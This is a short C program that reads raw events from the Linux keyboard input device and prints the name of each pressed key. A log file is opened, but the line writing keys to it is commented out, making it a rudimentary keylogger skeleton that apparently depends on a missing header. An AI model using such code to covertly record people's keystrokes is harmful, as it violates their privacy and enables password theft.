#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <linux/input.h>
#include <sys/time.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <linux/types.h>
#include "event_codes.h"
#include <stdio.h>
#include <stdlib.h>



int main() {

  struct input_event ie;
  int kbd_fd;
  static const char *const evval[3] = {
      "RELEASED",
      "PRESSED ",
      "REPEATED"
  };

  kbd_fd = open("/dev/input/by-path/platform-i8042-serio-0-event-kbd", O_RDONLY);
  fprintf(stderr, "%d\n", kbd_fd);
  FILE *logfile = fopen("blah.txt", "a");
  setbuf(logfile, NULL);

  while (read(kbd_fd, &ie, sizeof(ie)) > 0) {
    //fprintf(stderr, "type: %d  ", ie.type);
    //fprintf(stderr, "value: %d ", ie.value);
    if (ie.type == EV_KEY){
      if (ie.value == KEY_PRESS) {
        fprintf(stderr, "%s", key_names[ie.code]);
      }
    }
    //fputs(key_names[ie.code], logfile);
  }

return 0;

}
